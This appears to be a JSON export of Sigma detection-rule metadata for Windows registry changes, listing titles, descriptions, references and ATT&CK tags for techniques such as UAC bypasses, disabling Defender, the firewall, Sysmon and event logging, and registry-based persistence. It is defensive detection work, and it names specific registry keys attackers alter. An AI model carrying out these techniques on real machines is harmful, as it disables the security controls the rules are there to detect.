{ - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", - "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", - "value": "Bypass UAC Using SilentCleanup Task", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", - "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2022/01/06", - "filename": 
"registry_set_bypass_uac_using_silentcleanup_task.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", - "value": "Changing RDP Port to Non Standard Number", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "creation_date": "2022/01/01", - "filename": "registry_set_change_rdp_port.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Hides the file extension through modification of the registry", - "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "value": "IE Change Domain Zone", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", - "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ], - "creation_date": "2022/01/22", - "filename": 
"registry_set_change_security_zones.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "value": "Disable Sysmon Event Logging Via Registry", - "meta": { - "refs": [ - "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", - "https://youtu.be/zSihR3lTf7g", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/07/28", - "filename": "registry_set_change_sysmon_driver_altitude.yml", - "author": "B.Talebi", - "level": "high", - "falsepositive": [ - "Legitimate driver altitude change to hide sysmon" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "value": "Change Winevt Event Access Permission Via Registry", - "meta": { - "refs": [ - "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", - "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/09/17", - "filename": "registry_set_change_winevt_channelaccess.yml", - 
"author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", - "value": "CHM Helper DLL Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/htmlhelpauthor.html", - "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_chm_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1133" - ], - "creation_date": "2021/12/28", - "filename": "registry_set_chrome_extension.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe 
can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "value": "CobaltStrike Service Installations in Registry", - "meta": { - "refs": [ - "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2021/06/29", - "filename": "registry_set_cobaltstrike_service_installs.yml", - "author": "Wojciech Lesicki", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", - "value": "COM Hijack via Sdclt", - "meta": { - "refs": [ - "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", - "https://www.exploit-db.com/exploits/47696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" - ], - "creation_date": "2020/09/27", - "filename": "registry_set_comhijack_sdclt.yml", - "author": "Omkar Gudhate", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling the CrashDump per 
registry (as used by HermeticWiper)", - "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", - "value": "CrashControl CrashDump Disabled", - "meta": { - "refs": [ - "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" - ], - "tags": [ - "attack.t1564", - "attack.t1112" - ], - "creation_date": "2022/02/24", - "filename": "registry_set_crashdump_disabled.yml", - "author": "Tobias Michalski", - "level": "medium", - "falsepositive": [ - "Legitimate disabling of crashdumps" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", - "value": "Service Binary in Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/05/02", - "filename": "registry_set_creation_service_susp_folder.yml", - "author": "Florian Roth, frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "uuid": "277dc340-0540-42e7-8efb-5ff460045e07", - "value": "Service Binary in Uncommon Folder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/05/02", - "filename": "registry_set_creation_service_uncommon_folder.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the abuse of custom file open handler, executing powershell", - "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "value": "Custom File Open Handler Executes PowerShell", - "meta": { - "refs": [ - "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/06/11", - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", - "author": "CD_R0M_", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", - "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "meta": { - "refs": [ - "https://windows-internals.com/printdemon-cve-2020-1048/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/05/13", - "filename": 
"registry_set_cve_2020_1048_new_printer_port.yml", - "author": "EagleEye Team, Florian Roth, NVISO", - "level": "high", - "falsepositive": [ - "New printer port install on host" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "value": "CVE-2021-31979 CVE-2021-33771 Exploits", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" - ], - "creation_date": "2021/07/16", - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", - "author": "Sittikorn S, frack113", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", - "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" - ], 
- "tags": [ - "attack.defense_evasion", - "attack.t1221" - ], - "creation_date": "2020/05/31", - "filename": "registry_set_cve_2022_30190_msdt_follina.yml", - "author": "Sittikorn S", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence which will get invoked when an application crashes", - "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", - "value": "Add Debugger Entry To DbgManagedDebugger For Persistence", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574" - ], - "creation_date": "2022/08/07", - "filename": "registry_set_dbgmanageddebugger_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Setting of Windows Defender Exclusions", - "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "value": "Windows Defender Exclusions Added - Registry", - "meta": { - "refs": [ - "https://twitter.com/_nullbind/status/1204923340810543109", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/06", - "filename": "registry_set_defender_exclusions.yml", - "author": "Christian Burkard", - "level": "medium", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "value": "DHCP Callout DLL Installation", - "meta": { - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "creation_date": "2017/05/15", - "filename": "registry_set_dhcp_calloutdll.yml", - "author": "Dimitrios Slamaris", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "uuid": 
"bf9e1387-b040-4393-9851-1598f8ecfae9", - "value": "Disable Exploit Guard Network Protection on Windows Defender", - "meta": { - "refs": [ - "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/08/04", - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "value": "Disabled Windows Defender Eventlog", - "meta": { - "refs": [ - "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/07/04", - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling Windows Defender PUA protection", - "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", - "value": "Disable PUA Protection on Windows Defender", - "meta": { - "refs": [ - "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/08/04", - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", - "author": "Austin Songer @austinsonger", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling Windows Defender Tamper Protection", - "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", - "value": "Disable Tamper Protection on Windows Defender", - "meta": { - "refs": [ - "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/08/04", - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", - "value": "Disable Administrative Share Creation at Startup", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ], - "creation_date": "2022/01/16", - "filename": "registry_set_disable_administrative_share.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", - "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "value": "AutoLogger Sessions Tamper", - "meta": { - "refs": [ - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_disable_autologger_sessions.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", - "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", - "value": "Disable Microsoft Defender Firewall via Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2022/01/09", 
- "filename": "registry_set_disable_defender_firewall.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", - "value": "Disable Internal Tools or Feature in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/03/18", - "filename": "registry_set_disable_function_user.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "value": "Disable Macro Runtime Scan Scope", - "meta": { - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", - "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", - "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/10/25", - "filename": "registry_set_disable_macroruntimescanscope.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Disable Microsoft Office Security Features by registry", - "uuid": "7c637634-c95d-4bbf-b26c-a82510874b34", - "value": "Disable Microsoft Office Security Features", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/06/08", - "filename": "registry_set_disable_microsoft_office_security_features.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry modifications that disable Privacy Settings Experience", - "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", - "value": "Disable Privacy Settings Experience in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" - ], - "tags": [ 
- "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/10/02", - "filename": "registry_set_disable_privacy_settings_experience.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", - "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", - "value": "Disable Windows Security Center Notifications", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_disable_security_center_notifications.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of the registry to disable a system restore on the computer", - "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", - "value": "Registry Disable System Restore", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/04/04", - "filename": "registry_set_disable_system_restore.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", - "value": "Disable UAC Using Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2022/01/05", - "filename": "registry_set_disable_uac_registry.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", - "value": "Windows Defender Service Disabled", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_disable_windows_defender_service.yml", - "author": "J\u00e1n Tren\u010dansk\u00fd, frack113, AlertIQ, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect 
set EnableFirewall to 0 to disable the windows firewall",
- "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0",
- "value": "Disable Windows Firewall by Registry",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.004"
- ],
- "creation_date": "2022/08/19",
- "filename": "registry_set_disable_windows_firewall.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel",
- "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3",
- "value": "Disable Winevt Event Logging Via Registry",
- "meta": {
- "refs": [
- "https://twitter.com/WhichbufferArda/status/1543900539280293889",
- "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml"
- ],
- "tags": [
- "attack.defense_evasion",
